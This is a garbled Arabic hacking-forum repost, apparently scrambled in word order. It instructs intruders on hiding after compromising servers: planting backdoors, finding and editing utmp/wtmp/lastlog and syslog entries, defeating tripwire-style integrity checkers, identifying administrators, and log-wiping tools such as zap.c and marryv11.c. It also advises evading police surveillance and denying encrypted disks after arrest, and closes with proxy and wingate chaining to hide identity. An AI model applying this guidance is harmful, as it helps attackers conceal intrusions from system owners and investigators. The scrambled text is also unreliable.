Backup Files :dead.letter, *.bak, *~

ال لمسح ايضا موجود الحل  : History filesلكنmv .logout save.1

echo rm -rf .history<.logoutecho rm -rf .logout<<.logout

echo mv save.1 .logout<<.logout

منها - الحظر و تجنبها يجب اشياء و امور======================

على اال باسورد اي بكسر ابدا عليك encrypted partition التقوم كماعلى ) الجامعه اشتراك اشتراكاتك استخدام من تحذر انت دائما

المثال (  سبيلالشبكه مدير ماتفعله يرى ان يمكن البساطه بمنتهى و admin النه

الخ تستخدمها التي الملفات و به تقوم مالذي سيعرف ثم  .. مناحنا يعني لديك المشبوهه البرامج اسامي تغيير ان دائما حاول

الفاضي على مخيفه اسامي اسماء نسمي غاويين خصوصا  .. العرببعضاالشتراكات .. تستخدم ان حين يعني فقط نفسك في التفكر

ال الخلفي shellsاو بالعمل تسمح تعرف background التي ان البداالنظار تلفت بالتالي و السيرفر سرعة من تبطئ  !!! انك

التستخدم ان سبيل ... parametres حاول على المستطاع قدر علىاو معين لموقع تيلنت على الشيل من تتصل ان اردت اذا المثال

االتي بعمل التقوم معين telnet http://www.host.com/ 23 : سيرفرهي و البطيئه الخطوات اتبع ببساطه انما

telnetopen

http://www.host.com/هكذا  .. و

عليه تضع ان االفضل من معين سيرفر اخترقت انك حالة فيbackdoors التشغيل لنظام و ) هههههههههه sub7 مش ( مخصصه

االنترنت على مجانا موجوده و كثييره  هي

مالحظتها : يجب يتي الي الحديثه التقنيات الرابع  الجزء===============================

تمهيد -*******

اول ثبت ان تعرف .. sniffer بعد ان عليك االختراقات لبدا خططت ويلي ما متعبا التقنيات هذه تستخدم  : كيف

نوع - اي من اثرك تقفى  امنع**********************

كمخترق ) ( وجودك الشبكه مدير االدمين يالحظ انك hacker قد وكيفسيرصدك ... انه هو المهم اليهم هذا لكن المواقع باحد اطحت

معك يتعامل ان يمكن كيف عندها  !!! والذي االساليب و االحتماالت كل توضيح سيتم الجزء هذا ففي لذا

تمنعها ان يمكن كيف ايضا و رصدك و تتبعك بها  ... يمكن

الشكبه ) ( * مدير على يسهل ان العادي الطبيعي ) admin ( منذلك و شبكته على دخوله عند عليه المخترق كان الذي النظام معرفةهي ) كما لتركها غبي الهاكر كان ان هذا اللوق ملفات طريق عن اما

ال( من او output ال  sniffer مناوامر من موجودا netstat او مازال المخترق ان حالة  online في

ال تختاج هذا اجل  !! GateWay Server من

* A gateway server in between السيرفرات من الكثيير من واحد هذافي السخافه منتهى في تعتبر التي و عليها حساب لك يوجد التي

ال تغيير لتستطيع عليها رووت تكون الن تحتاج انت و االستخدامwtmp and lastlogs 

من اكثر استخدام من ان البد انه تبدل gateway server كما ان والكشفعنك يتم ال حتى باستمرار  .. بينهم

بال .. باالتصال قم منه ستخترق الذي الشيل و gateway server مناختراقه المراد بالسيرفر تتصل ثم  .. من

ل ( >== دائما اللوق root access تحتاج  ) لتغييرل انك .. Dialup server باستخدامك حيث المشاكل من الكثيير يجنبك

باشتراك تدخل ان بشرط اللوق ملفات في التعديل عن غنى فيال على فيها تدخل مره كل  )= hacked systemمختلففي

بسرفيرات : االتصال على قادر كنت اذا فال dialup ملحوظه كثييرهتستخدم الن الشركات hacking server حاجه بتغير اثرك سيتغير النه

خاللها من تتصل التي  المختلفه

اوروبا و االمريكيه المتحده الواليات في للمتواجدين بالنسبهسبق) ( بما قمت ان و حتى المتقدمه الدول ) dialup servers (

هذا سنيين منذ ارشيفات لديهم و تم اتصال كل تسجيل يمكنهم ! عددها

اللوق - ملفات انواع من نوع اي من lOGs ايجاد فيها كان مهما.. تالعب

**************************************************

***حتى اللوق ملفات كل على تعثر ان جدا الضروري و الهام من

ذلك .. يمكن الملفات هذه على العثور و للحصول منها المخفيالطريقتين  : بهاتين

باستخدام : - 1 ذلك يمكنك و المفتوحه الملفات جميع على اعثراختصار LSOF برنامج العثور List Open Files هو يمكن ثم من و

فيهم التعديل و  عليهمبعد ) ( - 2 من تغيير فيها حدث تغيرت التي الملفات كل عن ابحث

 - دخولكبعمل قم دخولك قم touch /tmp/check بعد بعدها find / -newer" و

/tmp/check -print" 

نتائج : -< -< بحث التالي الشكل ستاذخ بها سنقوم التي العمليهتعديل -< النتائج  مطالعة

ال اماكن على بالتشيك ايضا و /usr/adm االعتياديه log files قمvar/adm/ و var/log/ 

ال في العمليات تسجيل يتم فانت xx@loghost يعني loghost اذاال .. تخترق ان من البد انه حيث مازق في ملفات loghost هنا لتعدل

 اللوقاللوق تعديل محرر logfiles يمكن اي باستخدام ابسطها طرق بعدة

باستخدام text editor كتابه الملف اسطر بعد قم ثم wc او من واخر خالل 10حذف من اسطر : "head -LineNumbersMinus10"

مطروحا ( بالعربي السطور منه 10عدد - head ( برنامج كان ببساطه accouting اذا يمكنك السيرفر على مثبت

الالزم acct-cleaner from zhart استخدام هيعمل هو  و

يستخدم النظام كان انت utmpx و wtmpx اذا عزيز االسف فمع ايضالو !!! .. الحاله هذه في للتعامل برنامج اي اعرف على فانا ورطه فيبه ) ( تعلنا ان تنسى ال المبرمجين لالخوه واحد تبرمج ان استطعت

=(

من - syslog configuration and logfile تحقق************************************

ال على البرامج معظم ايشئ syslog function تعتمد لتسجيلخصائصال .. من تتحقق ان فعليك  syslogيريدونه

اللوقات كانت على logs فاذا انما الجهاز على فقط hosts التخزنهذه ... اختراق من البد انك فيؤسفني hosts اخرى

ال في syslog ملف /etc/syslog.conf موجود

المثبته - االمن برامج نوعيات من تحقق******************************

الحس ذات المواقع على غالبا الفحصاألمني برامج من العديد توجد . تسمى أداه بواسطه البرامج هذة وتدار العالي يكون cron األمني و

هو الطبيعي أو األفتراضي هي /var/spool/cron/crontabs مكانها والـ . خاصه المدخالت جميع بمتابعه التي Rootتقوم الملفات و

التالي. األمر نستخدم الموضوع من اللسريع للتحقق  يستعملها"crontab -l root".

. و المدير حساب على عامله و محمله األدوات هذه ماتكون غالباالـ مجلد في بعضها . ~/bin يكون هناك يكون ان يمكن كما به الخاص

sinnefer نفسالمكان في امنيه ألغراض .موضوعالداخليه الفحوصات هذه مثل في تستعمل الت األدوات  من

tiger, cops, spi, tripwire, l5,binaudit, hobgoblin, s3 etc.

من التأكد و األدوات هذه وجود من يتأكد أن المقتحم على ينبغياألقتحام , عمليه تكشف ال أنها من للتأكد ترسلها التي التقارير

عن باألبالغ تقوم لن أنها من للتأكد البرامج هذه مفات تعديل يمكنكبطريقتين, ذلك تنفيذ يمكن و :األقتحام

شويه ) - واسعه عنك باألبالغ يقوم ال لكي برمجيا البرنامج بتعديل قممزيفا( برنامجا أستعمل و بأزالته قم أو  دي

الـ - أزاله إلى تضطر تحميله back door قد محاوله و أستعملته الذيأخرى بطريقه

المدراء - وجود من Admins تحقق

**************************** , معرفه تحاول و الموقع على المدراء جميع تجد أن المهم من

أستخدامها يتم التي العاديه .الحساباتالمعلومات هذه لكشف طرق عده :توجد

الملف - بفحص الـ forword. قم مدخالت alias و- الـ تنفيذ sulog أفحصملف في نجحو الذين المستخدمين حدد و

بنجاح su root األمرالـ - ملف لها group أسحب التي المجموعات جميع عن أبحث و

باألداره admin, root, wheel, etc ( عالقه- ملف المدراء passwd أسحب سر لعرضكلمات للمدير بالنسبه

. إلى , أدخل الموقع على المدراء كل معرفه يمكنك هذا كل يعدالخاصه أحدى , ( مجلداتهم أستخدم أستطاعتك عدم حاله في

التاليه المستخدم chid.c, changeid.c األدوات شخصيه و . )ألنتحالالتاليه الملفات لمعرفه history/.sh_history/.bash_historyأفحص

, المدير دور معرفه في هذا يفيدك قد عادة يستعملونها التي األوامر . , بفحصملفات قم مخفيه معلومات أكتشاف أو الموقع على

.profile/.login/.bash_profile الـ أعدادات , aliasلمراجعه تستخدم التي . أن طبعا الطبيعي من و مستخدمه خفيه أمنيه أدوات ماكانت إذا وقد , منها المخفيه خاصه المجلدات و الملفات بفحصكافه تقوم

حقا المفيده بعضاألشياء  تجد

checksum checking software************************

البيانات ( checksum برامج خلو من للتأكد تستعمل رقمية قيمة هو . الجمع كشف عملية خالل من تحسب القيمة هذه األخطاء )من

اي حدوث من للتحقق برامج باستعمال ويقمون المدراء بعضبفحص يقوم تغير، اي حدوث حالة وفي الملفات، في تغييرات

اكتشافها ويستطيع الملفاتاالنواع واي التحقق برامج هناك استخدمت مااذا تعرف فكيف

؟ اجلك من تخدم بحيث تعدلها فكيف واذاعرفت استخدمت؟منها واحدة كتابة السهل ومن التحقق برامج من عديدة انواع هناك

البرامج تلك مثل استخدمت اذا ما اكتشاف الصعب من ولكن بنفسكللحماية الملفات علي

فحص عملية ب تقوم التي البرامج بعض اسماء checksum هذهSOFTWARE : STANDARD PATH : BINARY FILENAMES

tripwire : /usr/adm/tcheck, /usr/local/adm/tcheck : databases, tripwire

binaudit : /usr/local/adm/audit : auditscanhobgoblin : ~user/bin : hobgoblin

raudit : ~user/bin : raudit.pll5 : compile directory : l5

قواعد او نفسه البرنامج ربما كثيرة، احتماالت هناك تري كماجزء مثل آخر، جزء علي يوجد ، NTFS البيانات آخر جهاز او لمضيف

معلومات تحمل التي بيانات قواعد حتي جهاز checksum او فيالكتابة علي ... ) مثال CD اقراص ( محمي

البرامج لمعرفة سريع فحصاستطالعي بعملية القيام يمكنك ولكن

ولكنك شي تجد لم واذا ففرصتك، تستخدم لم واذا ، المستخدمةان يعني هذا البرامج من االنواع لتلك استخدامهم من متاكدا كنت

تعبث ) ( ال ان ويجب لك هارد جيدا بشكل محمي المزود او الموقعابدا .. بالملفات

وبامكانك البرامج تلك يستخدمون انهم اكتشفت اذا ماالعمل ولكنتغييرها؟؟

ما - 1يمكنك ملف تغيير تم بانه شرعي بطرق البرنامج تلك ايهام مثال البيانات قواعد تحديث ويتم قانوني tripwire -update" بشكل

/bin/target".

اسم - 2 وتزيل فحصها يجب التي الملفات قائمة تغيير يمكنكللتحقق اخري مرة فحصها يتم فال القائمة من المراد ( الملفات

يتم ال نفسها البيانات قواعد ملف ان ايضا تتاكد ان يجب ولكنب بها checksum فحصها قمت التي التغييرات اكتشاف يتم ال ) حتي

االمنيه - المستخدم  حيل*******************

شملت الكون فقط كتبتها لكنني تستخدم او توجد ندر ما الحيل هذهيسمون ) ( .. المستخدمين فبعض الموضوع لكمال شئ كل

اي admins اشتراكاتهم ملفاتهم في يعبث ان يريدون ال بالطبع وال ملفات في الحيل بعض بعمل فدائما startup شخصفيقومون لذامن تبدا ) profile, .cshrc, .login, .logout. تحقق التي الملفات اي الخ

 بنقطه (

الخامس : الجزء=========

المراقبه؟ تحت وضعت ان تفعل ماذا***************************

او ) ( الشرطه قبل من المراقبه الميكروسكوب تحت اصحبت متىال حتى administratorsحتى سريعه و هامه بخطوات القيام عليك

عليك ) ( برهان بدليل االمساك  اليستطيعو

ال : - اعتقاد في كان ان فانت hacker انك administrators ملحوظهبراته==< تثبت حتى مذنب ...

لل شئ اي القانون يوجد ( admins اليعني ال انه اعتقد بعضاالوقاتال بين ال hacker فرق هو administrator و الكومبيوتر مالك بان االفورا ) فقط administrator ال فانك هاكر انك يعتقدون عندماو .. اللكتروني بريدك بمراقبة مباشرة سيقومو مذنب اصبحت

االخرى هجماتك ايضا سيرصدك االدمين محترف كان ان و  .. ملفاتكيمكنهم ببساطه اكيد االتصاالت هذه كل مراقبة يمكنهم كان اذا

تيليفونك خط  .. مراقبةحتى .. ان و اخترقاتك اخبار فيها اتصاالت باي القيام عدم فعليك لذا

اذا ) اال الكتروني ببريد او هاتفيا تخبرهم فال اصحابك تحذر ان اردت.. ) لوجه وجها تقابلهم عندما تخبرهم ان االفضل من و مشفرا كان

عاديه غيير رسائل اي راسال من تمنعهم  .. وشهر من االقل على الحال هذا على تبقى ان عليك نفسك لتؤمن

بها .. الترغب انك اعتقد مشاكل ستواجه اال و شهرين  الى

السادس : الجزء=========

حالة في به القيام عدم من البد الذي ايضا و به القيام عليك الذي ماالقبضعليك تم :انه

**************************************************

************** على : !!!! : ترد و انت تتذكى بان تحاول ال فورا محاميك اطلب اوال

يطلعك .. و هو عنك يدافع كي محاميك فاطلب بمفردك التحقيقما .. غالبا بعدها نهائيا تذكره ال ان يجب ما و تذكره ان يجب ما على

بحجة ) ( سرعه باقصى الكومبيوتر جهازك المحامي سيطلبو الماديه االعباء جميع تحميل عليهم اال و العمل في احتياجهمن .. فانه لذا الجهاز استخدام عدك عن تحدث قد التي المشاكلتقع ان قبل وقت اي في جاهز محامي عندك يكون ان جدا العملي

التدوير و البحث في تبدا بعدها الراسو الفاسفيمعلومات : !!! : اي للشرطه التعطي الشرطه اال تتكلم ال ابدا ثانياسيخرجك و عنك العقاب سيخفف هذا ان بحجة زمالئك عن او عنك

يجب .. .. كان ان و اكثر سيدينك بل يفيدك لن هذا الن المازق منايضا ) هذا و محاميك خالل من فقط هذا يتم ان فاطلب استجوابك

حقوقك ( من  حقايضا .. انما الشهامه من كنوع ليسققط اصدقاؤك عن ابدا التخبر

تزيد ثم من و الموضوع دائرة ستتسع الموضوع في اصحابك بدخولايضا هم و جرائمك عن و عنك ! المعلومات

تشفير فك الشرطه تستطع لم اذا انه قانونها ضمن من الدول بعضعدم الحريه بمنتهى فيمكنك ديسك الهارد من جزء او ملفاتك

عنها االفصاحالمصيده في وقعت مادامت انه قانونها في االخرى الدول بعض لكن

باستشارة انصحك الحاله هذه في شئ بكل لهم تدلي ان البدمشفره اقراصصلبه اي لديك انك انكار و  محاميك

السابع : الجزء========

االختباء و للتخفي البرامج بافضل : قائمه******************************

Change - Changes fields of the logfile to anything you wantDelete - Deletes, cuts out the entries you want

Edit - real Editor for the logfileOverwrite - just Overwrites the entries with zero-value bytes.

Don't use such software )f.e. zap( - it can be detected!---------------------------------------------------------------

LOG MODIFIER++++++++++

ah-1_0b.tar Changes the entries of accounting informationclear.c Deletes entries in utmp, wtmp, lastlog and wtmpxcloak2.c Changes the entries in utmp, wtmp and lastlog

invisible.c Overwrites utmp, wtmp and lastlog with predefines values, so

it's better than zap. Watch out, there are numerous inv*.c !marryv11.c Edit utmp, wtmp, lastlog and accounting data - best!

wzap.c Deletes entries in wtmpwtmped.c Deletes entries in wtmp

zap.c Overwrites utmp, wtmp, lastlog - Don't use! Can be detected!

--------------------------------------------------------------------------------------الثامن  : الجزء

=========ختاميه كلمه

**********اعرف .. .. مفتوحان عيناك اجعل دائما عليك يقبضون ابدا التدعهم

ال من و تثق من  !! فيحولك ) ( من كل تذكر ايضا انما فقط نفسك في  التفكر

امنه و ممتعه بحياة للجميع .. تمنياتي،،،انتهى14.

15." ) ؟؟ ) األول الجزء النت في الهوية مجهول تبقى " كيف> إعصار منتدى من >منقول

> المدمر: >الكاتببتعليمكم أقوم سوف الموضوع هذا في

ماهو؟Proxy - Sock Host - Wingate

-) في هويتك الكشفعن صعوبة من للزيادة استخدامهم وكيفية-)النت

التخفي في تساعدك أيضا بسيطة أدوات  مع

++++++++++++++++++++++++++++++++++

Introduction to Proxy Server=) إلى الوكيل: proxy server الدخول خادم =)أي

proxy server ) الوكيل خادم )خادم بتنزيله server هو ما أحدا ليقوممايفعله اإلنترنت على جهاز أي أو المواقع مع لإلتصال نظامه على

الوكيل بخادم االتصال هو  proxy server أوالالشبكات في مايستخدم غالبا لكن إجباري غير  لكنه

LAN:مثلLocal Area Network

باإلنترنتخالل اتصالك عند محلية إنترنت جميع proxy server شبكةكل وقبل أوال المستخدم البروكسي هذا إلى تذهب سوف اتصاالتك

كمثال بها إتصال تعمل أن تريد التي األجهزة على تتوزع ثم شيءاستخدام خالل من باإلنترنت تتصل أن أردت وتريد proxy server إذا

كهذا موقعا وتفتح تتصفح أنhttp://hackergurus.tk/

هذا من بالطلب أوال يقوم proxy server عليك proxy server ثمالصفحة  بطلب

http://hackergurus.tk/الخادم حسابها server إلى في وتخزينها تحميلها ثم ومن الموقع

: تستعرضها أي الصفحة وتعطيك تمدك سوف ذلك ...بعدتأخذ العملية هذه باإلتصال bit أليست مقارنة أطول وقت في بسيط

) الموقع ) خادم من الصفحة بطلب فقط يكلفك الذي العادي المباشر

واستعراضها بسهولة تحميلها جاري ثم ومنباإلنترنت اتصالك يصبح سوف سيرفر للبروكسي استعمالك مع لكن

تقوم صفحة كل ألن وذلك المباشر االتصال مع مقارنة بطيءأي البروكسي خادم إلى تذهب تستعرضها أي proxey بتحميلها

server التصفح عملية يثقل  وهذاتصبح وقد وحدة حالة كيف lucky وهناك قل  بعضاألحيان

واستعرضنفس البروكسي نفس باستخدام الشخصقام إذاالشخص هذا استخدمه الي البروكسي استخدمت وانت الصفحات

سريع البروكسي يصبح راح استعرضها الي الصفحة واستعرضت!ليه؟

الصفحات وعرض البروكسي باستخدام قام الي الشخصاألول ألنإلى حملت نفس proxy server الصفحة لديك كان إذا بالك فما

ألن سريع يكون سوف تسعرضنفسالصفحة وحبيت البروكسيفهمت download الصفحة #.. جاهزة

استعرضصفحة الواحد اذا مثال مهم الوقت ياأخواني وأيضاقبل من البروكسي 10ببروكسي نفس استخدمت وانت أيام

ألن يومين في عرضها اذا غير نفسالصفحة proxy واسعرضتserver تالحظ أحيانا كذا علشان القديمة على الحديثة المواقع يقدم

عمل ماعليك كل البروكسيات في تأخرأو&@#&@#&@#&@#&@#&@#&@# Reload

Why use a Proxy Server=) سيرفر؟ البروكسي نستمعل =)لماذا

البروكسي خادم مادام يسئلوني الي األخوان على اجاوب راح وانامالدافع إذا السرعة من والتقليل التحميل إبطاء بعملية يقوم

؟ !!!الستخدامهاإلنترنت: خدمة مزودين أن هو  الجواب

ISPInternet Service Provider

الستعراض السماح عدم قفصوهو في وبوضعك بالتحديد يقومونالخدمة مزود قبل من عليها الموافقة تم التي إال الصفحات وتحميل

على للحفاظ المواقع بتقليل لتوفير Traffic ويقومون الخاصبهملمشتركينهم البروكسي استخدام في  السرعة

استعراضأي proxy server أما في الكاملة الحرية لك يجعل سوفمن للزيادة أو للحفاظ وهو للبروكسي آخر وسبب كان مهما موقع

لو يعني االتصال عمليات من عملية بأي قيامك أثناء مجهوال بقائكوذلك اصطيادك الموقع خادم على يصعب راح بروكسي استخدمتيأخذ وهو ip ألنه خالله من الموقع اتصل وهو ip الذي البروكسي

الموقع خادم مع يتصل الذيوذلك بك االسقاط محاولة صعوبة من الزيادة تستطيع وأيضا

هذا أن أعلم لكن مختلفة منافذ ذات بروكسيات عدة باستخدامتستخدم ان حاول لذلك االتصال سرعة من بتقليل يقوم  سوف

proxy و port يكون حتى تعيشفيها التي منطقتك إلى قريبينproxy server سرعة تفوق وأحيانا السرعة تزداد سوف وبذلك قريب

مارأيك الخدمة بمزود الخاص بروكسي سرعة ).. !!البروكسيمايكروسوفت ببروكسيات تنخدعوا أن ياأخوان إياكم للجميع تحذير

استخدم يقول كأن إعالن من لها وضع مهماcach.microsoft.com 80بمنفذ

المميزات بهذي بروكسي تالقي ماتصدق انت  وطبعاالتصفح -1  سريع

المواقع -2 جميع يفتحوقوي -3 جدا عالي  التحميل

؟ لماذا تعرف هلوهذا سيرفر البروكسي هذا العالم حول المستخدمين أكثر ألن

جدا خطيرتحركاتك جميع بمعرفة يقوم سوف سيرفر البروكسي هذا الن

ملفات في Logs وحفظها

Introduction to Wingate=) إلى اإلدخال أو =)Wingate الدخول

؟ الحقيقي معناه نعرف هل لكن عنه مانسمع كثيرا؟ WinGate ماهو

بروكسي proxy server firewall هو خادم وهو البروكسي يفوق أيالمختصة البرامج من وضخمة كبيرة حزمة على يحتوي ناري حاجز ذو

تبقيك والتي ( Anonymously بالحماية الهوية )مجهولاتصاالت من بعدة أو واحد بفرد بالمشاركة بالسماح تقوم التي

بالكامل كمبيوتر بشركة اإلنترنتبواسطة مشارك يكون اإلنترنت أنواع WinGate اتصال لعدة تقريبا

:تشمل-------------------------------------------------------------------------------------------

dial up modem, ISDN, xDSL, cable modem, satellite connection, or even dedicated T1 circuits

-------------------------------------------------------------------------------------------wingate 

كومبيوتر مع اتصاالت يعمل حيث سيرفر البروكسي مع متشابهالمنفذ خالل آخر اتصال , 23لسيرفر هو الحقيقة في Telnet .

the wingate أو اإلنترنت دخول الشبكة أيشخصعلى يجعل سوفبين . وفق سيئة بصورة أخرى لمواقع به وعدم wingate االتصال

)المدير( Aminstrator كفاءةمن العديد اإلنترنت wingate وهنالك األشخاصعلى تجعل والذي

للناسمن , المدخل تحديد من بدال ببعضهم Local Network لإلتصال) المحلية )الشبكة

من شيئ ألي الطريق سوء ICQ - Mirc في ipspoof وفتح إلىالحجم . استغالل

عليه wingate مثال يطلق في open wingates قد مدتها تنتهي وعادةباكتشافه يقوم حتى شهور أو أيام راح )المدير( Admin بضعة وهذا

سوء DIScover يكون من شكاوي يتلقى أو مكشوف يعني ياأخوانيغامضين أعضاء أو !!! استخدام

مستخدمين وضع على القدرة هي للمديرين الوحيدة الفائدةالفوائد تفوق المشاكل ياأخوان لكن نفساالتصال في متعددين

بتنزيل شخصقام أي بشدة WinGate إذا الحذر عليه به خاصأخرى وهنالك آمن بشكل موفق أنه من ويتأكد يفعل ماهو ومعرفة

أكثر برامج WinGate متعددة مثل  SyGate أماناملفات الحاالت معظم بالـ )سجالت( Logs في WinGateالخاصة

Server بعد عادة للـ 48تحذف وأيضا لألعمال ساعة ISP's )خاصة )بالكبار

خادم يصادف شيء كل لتدوين موارد أو حاجة اليوجد  wingate أي

How do I find Wingates=) على الحصول يمكنني =)؟WinGate كيف

بإمكانك . بالفم كلمة هو الشيء هذا على للحصول طريقة أفضلعنوان الثاني . wingate تاخذ الشيء عنده أحد كان إذا أصدقائك من

برامج تستخدم عليك  أقترحWinGate Scanner

في فقط ابحث بالنت منها العديد  google هنالكhttp://www.google.com/

مدى وضع هو فعله ماعليك بالبحث hostname او ip كل البدء ثم ومناألوسط الشرق أو الثالث العالم بالد في البحث عليك اقترح مثال

شبكة وأخيرا صفات @home وأفريقيا ولديهم يتشابهون كلهموهي :شائعة

هناك wingates توفر وعادة رديئة بصورة وفق wingate والذيعلى قليل ... حقهم NetWork مفتوح

: Unix خالل والخطأ المحاولة هي طريقة  أفضلTrial and Error

بالتلنتفي المنفذ wingate اتصل 23من  واحد تحصل راح دخلت واذا والباسوورد االسم فراغ اترك لقيت واذا

ميزة تستخدم او سرك وكلمة اسمك تجربة بإمكانك ( Guest أيضاAnonymously أو )الضيف

Introduction to Socks Host=) إلى اإلدخال أو =)Socks Host الدخول

Socks Host مثل السوكس WinGate تقريبا ان وهو االختالف لكنالمنفذ خالل من وهي 1080يتصل عليها اإلعدادات عمل وبإمكانك

المتصفح في  تتوفرexplorer and netscape

إضافة  Socks Host وبإمكانكفي كثيرا تستخدم الطريقة وبإخفاء Mirc وهذه بحمايتك ip وتقوم

كـ وتعمل  FireWallالخاصبك

**********************الهوية مجهول بقائك على مساعدة برامج  وهذه

**********************Ghost Surf 

$$$$$$$$$$$$$$$$$$$$$$Stealther

-------------------------------------------اإلنترنت في السابقين البرنامجين عن ابحثوا

--------------------------------------------مجهوال تصبح لن مافعلت وبكل أن الكريم ياأخي أعلم 100لكن %

،،،انتهى

" ) ( ؟؟ الثاني الجزء النت في الهوية مجهول تبقى " كيف> إعصار منتدى من >منقول

> المدمر: >الكاتبوليسكالسابق عملي تطبيق فيه يكون سوف هذا الموضوع ...ألحين

عن الفقرات على Chaining Proxies هذه وسريتك حريتك لبقاءالموضوع هذا ان التظن لكن اتصالك أثناء أطول وقت اإلنترنت

المجهول الشخص تصبح الجانبسوف هذا عن قرأت فكلما  كافيعن نتكلم سوف على Chaining wingates وأيضا مجهوال لتصبح

Telnet 

-------------------------------------------)يستخدم أغلبكم أن المعروف او ip إلخفاء proxy من به الخاص

Domain المغلقة المواقع يجتاز لكي البروكسي يستخدم قد اوهويته لحماية . وأيضا

تستخدم كيف تتعلم ان عليك ماذا Proxy لكن تعرف ان األفضل ومن,,, أوال Domain و Ip Address هو

تحصل كيف بإرشادك اقوم ان اوال علي الموضوع هذا تقرأ أن قبلالمواقع Proxy على هذه من تحديثها :مع

http://www.multiproxy.org/anon_list.htm http://tools.rosinstrument.com/proxy/ 

بـ تسجلون إنكم وأنصحكم لكم أفضل طريقة هنالك وهو Groupأومختلفة وبمنافذ جدا جديدة بروكسيات بإرسال  يقومP_R_O_X_Y@yahoogroups.com:الجروب

التسجيل  طريقةالطريقة بهذه للجروب وأرسل حسابك إلى بالدخول قم

اكتب إلى اإلرسال خانة فيP_R_O_X_Y-subscriber@yahoogroups.com

قم مباشرة رد تتلقى سوف ذلك بعد إليهم فارغة رسالة وأرسل Replay بعمل

بالجروب سجلت لقد مبروك اآلن-------------------------------------------)

=========================أن من التأكد تستطيع به تقوم عمل كل في بمساعدتك أقوم لن أن

إلى بالذهاب يعمل : البروكسيhttp://www.privacy.net/

أوhttp://www.proxytester.com/

عنوان تعرفهل أما !!! Ip وقد األول للموقع بالنسبة هذا ال أم تغيرمستوياتها واعطائك البروكسيات خاصلكشف فهو الثاني .. الموقع

=========================

*************************************

&&&&&&&&&&&&&&proxy server

&&&&&&&&&&&&&&

خادم بين Proxy هو باالتصال  يقوم WebSite,IRC Chat,etc(

يستعرض او يستقل لكي طلبات بإرسال تقوم البروكسيات هذهعلى طلبك يرسل البروكسي اإلنترنت على موقعا المستخدم

الموقع تدخل سوف ذلك وبعد الموقع هذا يطلب لكي اإلنترنتفي يخزن سوف وهذا  Proxy Server ببروكسي

السابق الموضوع في قلنا ...كما

بالموقع البروكسي طريق عن تتصل كيف توضح  هذي[User]<<<<<[Proxy]<<<<<[Web Pages] 

----------------Proxy Chaining 

----------------مجهوال تصبح لكي جدا فعالة طريقة وهذي بروكسيات عدة معناها

تعرضموقع لكي بروكسي من بأكثر تتصل ان يمكنك حيث الهويةواحد/مثال

[User]<<<[Proxy1]<<<[Proxy2]<<<[Proxy3]<<<[Proxy4]<<<[Destination] 

االول بالبروكسي االتصال عليه اوال المستخدم ان المثال هذا يوضحاالتصال في بطأ يسبب مما الهدف وأخيرا والرابع فالثالث فالثاني

Destination = web page, Unix server, ftp server, etcليحفظ Proxy chaining إذا هكر أي يستخدمه لكي مطلبضروري

أي إلى الدخول اثناء  telnet, ftp, or http مثل server سريتهChaining مجهوال تصبح لن أقول كما مهمة حاول% 100هي لكن

لكن السمكة مثل ويطادونك تمسك ال ان على المستطاع بقدرتدخل حاولت مثال لكن احدا يكشفها ان صعب المتعددة البروكسيات

بالـ موقع فلوس ftpعلى معاه كان لو كذا بعد البروكسي يصطاد راحمن طلب كان

Adminstrator ملفات Logs راح ايضا والمصدر المصدر يعرف لكيالى proxy يكون يصل ان إلى المنوال هذا على يعني ههههههههه

عملية لذلك ويصعب Chaining Proxy المستخدم جدا مفيدة عمليةبك االمساك  احدهم

ملفات البروكسي Logs لكن على الضغط بعد اوقات تنحذففيعلى الملفات تحميل من به المسموح الحد الى يصل لكي

تصبح سوف لذلك البروكسيات على يحتوي الي الخادم البروكسي... متجددة Logs ملفات

----------------HTTP Chaining 

----------------HTTP chaining نفسطريقة من Proxy هي عملها ويمكنك

خانة وفي  Address مستعرضك:مثال

http://proxy.magusnet.com/-_-http://www.google.com 

صحيح )-_-( مسبقا ترونها لم وجديدة جميلة !!! حركةاستخدام يمكننا :مثل Chaining وأيضا

http://proxy.server1.com/-_-http://p...estination.com

بمنافذها بروكسيات عناوين وضع يمكننا  او

http://anon.free.anonymizer.com/http://www.google.com 

آخر مثال

المواقع )/( بين عالمة  كإضافة

http://proxy1/http://proxy2:80/proxy.../www.yahoo.comproxy = لك أفضل يكون رقمي ببروكسي ..... استبدله

----------------Browser Chaining 

----------------حديثي يكون سوف وانا متصفحك من البروكسي استخدام وهو

عن استخداما Internet Explorer فقط األكثر ---- ألنهبروكسي عندنا مثال  ألحين

213.234.124.23:80213.234.124.23العنوان:

80المنفذ:بالـ الخاص البروكسي بدال نحطها كيف خدمة ISPألحين مزد أي

 اإلنترنتعند  نروح

Tools أدواتإنترنت  Internet Options خيارات

اتصاالت  Connections بعدينبعدين االنترنت في تدخل الي االتصال  تختار

 Settings إعداداتتجد  راح

Address )العنوان(Port )المنفذ(

بداله  ونضعه:213.234.124.23العنوان: و 80المنفذ موافق اضغط كذا وبعد

المتعدد االستعراض نستخدم نبغى  Chaining Proixes والحينمثل واحد من أكثر نحط العنوان في واحد بروكسي مانحط بدال

/كذاAddress: 213.234.124.23:80 121.172.148.23:80 143.134.54.67 Port:

80 

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

&&&&&&&&&&&&&&Wingates

&&&&&&&&&&&&&&Wingate هو proxy server ليسمح جهازها او جهازه في ينزل الذي

خالل بالمنفذ مقاعدهم ليأخذون أفراد بعدة او 23بالفرد منفذ(( Telnet العادي ((

شخصمتصل Wingates بعض ألي به online يسمحون يتصلون لكيليسمن هذا ان اعلم لكن االيام التتعدى قصير وقت في او مباشرةللـ خصائص وهنالك استخدام Adminالقانون من على wingate تمنع

ال أم المجال هذا في يفهم هل المدير حسب على هذا !!!! جهازهعن عبارة على ip وهي خاللها من تتصل أجهزة اسماء أو أجهزة

بأداة 23المنفذ Telnet ببرامج بحث عمل من يمكنك  أوWinScanWingate 

-------------------------------Chaining Wingates Using Telnet 

-------------------------------

عدة نستخدم راح نحتاجها Wingate ألحين التي واألدوات  كالسابق

فقط أهم Telnet وأداة DoS هي من تخلو سوف األجهزة أن ألظننادرا إال األداتين ..... هذين

المنفذ wingate جميع طريق عن ليسمهما 23تتصل المنفذ لكن بالـ االتصال يتم كيف فقط تتعلموا لكي لكم أضيفها لكنيسوف

Telnet المنافذ طريق  عن

إحضاره امكننا جهاز عنوان  وهذا

23ومنفذه 61.133.119.130هو

طريق عن به االتصال :مثل Telnet ويتم

C:\WINDOWS<telnet 61.133.119.130 23 خطوتك تعثر قد ناقصة او زائدة فمسافة المسافات وجود  الحظ

